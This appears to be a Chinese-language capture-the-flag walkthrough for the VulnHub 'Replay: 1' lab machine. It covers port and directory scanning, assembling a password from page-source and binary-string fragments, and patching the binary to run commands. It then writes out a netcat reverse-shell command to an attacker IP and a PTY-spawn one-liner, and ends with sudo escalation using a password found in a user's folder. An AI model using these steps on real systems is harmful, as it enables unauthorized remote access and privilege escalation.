vulnhub:https://www.vulnhub.com/entry/replay-1,278/
导入靶机,放在kali同网段,扫描

靶机在192.168.81.8,扫描端口

开启了三个端口,存在网站服务,访问

网页上有个超链接,点击后下载了这样一个文档文件

网页元素里有这么一行

P1:qGQjwO4h6g,目前作用未知,扫描网站目录

扫到几个,查看一下,files和media都是网页直接能访问到的东西,没啥用,robots指出一个新的文件

下载下来,解压出来一个文档和一个程序

文档里没有有用的内容,当以字符串查看程序时找到这样一句话

之前找到一个P1,应该是要和这个拼接成一个密码
qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul
现在尝试运行程序

输入IP和密码后成功执行,但是输入命令时又提示不允许

看了网上的分析这个程序实际上执行的是文件里的whoami,修改为uname -a,同时删除as后的冒号和空格


保存后再次执行

这次这里显示的就不是Bob,而是新写入的命令,所以我们写入反弹shell的命令,但是要注意写入时要让文件大小不变,所以需要插入额外的字符
nc -e /bin/bash 192.168.1.25 4444;ls;ls;ls;ls;ls;ls;ls;

kali开启监听,再次执行程序

获得shell,生成交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
sudo命令需要密码,找找看
在bob家目录的文档文件夹下的.ftp文件夹找到了bob的密码文档

b0bcat_1234567890

显示我们可以用所有的sudo命令,sudo su提权

flag在根文件夹









![[Linux]从零开始的网站搭建教程](https://i-blog.csdnimg.cn/direct/1cd47873981f4e9584d1c552f9cd82f0.png)









